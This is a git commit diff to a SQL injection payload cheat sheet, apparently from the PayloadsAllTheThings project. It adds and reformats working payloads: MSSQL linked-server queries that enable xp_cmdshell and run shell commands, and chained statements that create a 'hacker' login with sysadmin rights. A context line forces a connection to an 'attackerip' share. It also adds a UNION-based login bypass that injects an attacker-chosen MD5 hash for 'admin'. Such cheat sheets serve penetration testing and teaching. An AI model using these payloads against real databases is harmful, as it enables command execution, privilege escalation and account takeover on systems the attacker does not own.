SQL injection hashed password + MSSQL links

swisskyrepo · swisskyrepo · commit 5c0ee4c6d978 · 2025-11-02T18:21:19.000+01:00
diff --git a/SQL Injection/MSSQL Injection.md b/SQL Injection/MSSQL Injection.md
@@ -338,34 +338,37 @@ RESTORE VERIFYONLY FROM DISK = '\\attackerip\file'
 
 ## MSSQL Trusted Links
 
+A trusted link in Microsoft SQL Server is a linked server relationship that allows one SQL Server instance to execute queries and even remote procedures on another server (or external OLE DB source) as if the remote server were part of the local environment. Linked servers expose options that control whether remote procedures and RPC calls are allowed and what security context is used on the remote server.
+
 > The links between databases work even across forest trusts.
 
-```powershell
-msf> use exploit/windows/mssql/mssql_linkcrawler
-[msf> set DEPLOY true] # Set DEPLOY to true if you want to abuse the privileges to obtain a meterpreter session
-```
+* Find links using `sysservers`: contains one row for each server that an instance of SQL Server can access as an OLE DB data source.
 
-Manual exploitation
+    ```sql
+    select * from master..sysservers
+    ```
 
-```sql
--- find link
-select * from master..sysservers
+* Execute query through the link
 
--- execute query through the link
-select * from openquery("dcorp-sql1", 'select * from master..sysservers')
-select version from openquery("linkedserver", 'select @@version as version');
+    ```sql
+    select * from openquery("dcorp-sql1", 'select * from master..sysservers')
+    select version from openquery("linkedserver", 'select @@version as version')
 
--- chain multiple openquery
-select version from openquery("link1",'select version from openquery("link2","select @@version as version")')
+    -- Chain multiple openquery
+    select version from openquery("link1",'select version from openquery("link2","select @@version as version")')
+    ```
 
--- execute shell commands
-EXECUTE('sp_configure ''xp_cmdshell'',1;reconfigure;') AT LinkedServer
-select 1 from openquery("linkedserver",'select 1;exec master..xp_cmdshell "dir c:"')
+* Execute shell commands
 
--- create user and give admin privileges
-EXECUTE('EXECUTE(''CREATE LOGIN hacker WITH PASSWORD = ''''P@ssword123.'''' '') AT "DOMINIO\SERVER1"') AT "DOMINIO\SERVER2"
-EXECUTE('EXECUTE(''sp_addsrvrolemember ''''hacker'''' , ''''sysadmin'''' '') AT "DOMINIO\SERVER1"') AT "DOMINIO\SERVER2"
-```
+    ```sql
+    -- Enable xp_cmdshell and execute "dir" command
+    EXECUTE('sp_configure ''xp_cmdshell'',1;reconfigure;') AT LinkedServer
+    select 1 from openquery("linkedserver",'select 1;exec master..xp_cmdshell "dir c:"')
+
+    -- Create a SQL user and give sysadmin privileges
+    EXECUTE('EXECUTE(''CREATE LOGIN hacker WITH PASSWORD = ''''P@ssword123.'''' '') AT "DOMAIN\SERVER1"') AT "DOMAIN\SERVER2"
+    EXECUTE('EXECUTE(''sp_addsrvrolemember ''''hacker'''' , ''''sysadmin'''' '') AT "DOMAIN\SERVER1"') AT "DOMAIN\SERVER2"
+    ```
 
 ## MSSQL Privileges
 
diff --git a/SQL Injection/README.md b/SQL Injection/README.md
@@ -182,6 +182,30 @@ sql1 = "SELECT * FROM admin WHERE pass = '".md5("ffifdyop", true)."'";
 sql1 = "SELECT * FROM admin WHERE pass = ''or'6�]��!r,��b'";
 ```
 
+### Hashed Passwords
+
+By 2025, applications almost never store plaintext passwords. Authentication systems instead use a representation of the password (a hash derived by a key-derivation function, often with a salt). That evolution changes the mechanics of some classic SQL injection (SQLi) bypasses: an attacker who injects rows via `UNION` must now supply values that match the stored representation the application expects, not the user’s raw password.
+
+Many naïve authentication flows perform these high-level steps:
+
+* Query the database for the user record (e.g., `SELECT username, password_hash FROM users WHERE username = ?`).
+* Receive the stored `password_hash` from the DB.
+* Locally compute `hash(input_password)` using whatever algorithm is configured.
+* Compare `stored_password_hash == hash(input_password)`.
+
+If an attacker can inject an extra row into the result set (for example using `UNION`), they can make the application receive an attacker-controlled stored_password_hash. If that injected hash equals `hash(attacker_supplied_password)` as computed by the app, the comparison succeeds and the attacker is authenticated as the injected username.
+
+```sql
+admin' AND 1=0 UNION ALL SELECT 'admin', '161ebd7d45089b3446ee4e0d86dbcf92'--
+```
+
+* `AND 1=0`: to force the request to be false.
+* `SELECT 'admin', '161ebd7d45089b3446ee4e0d86dbcf92'`: select as many columns as necessary, here 161ebd7d45089b3446ee4e0d86dbcf92 corresponds to `MD5("P@ssw0rd")`.
+
+If the application computes `MD5("P@ssw0rd")` and that equals `161ebd7d45089b3446ee4e0d86dbcf92`, then supplying `"P@ssw0rd"` as the login password will pass the check.
+
+This method fails if the app stores `salt` and `KDF(salt, password)`. A single injected static hash cannot match a per-user salted result unless the attacker also knows or controls the salt and KDF parameters.
+
 ## UNION Based Injection
 
 In a standard SQL query, data is retrieved from one table. The `UNION` operator allows multiple `SELECT` statements to be combined. If an application is vulnerable to SQL injection, an attacker can inject a crafted SQL query that appends a `UNION` statement to the original query.
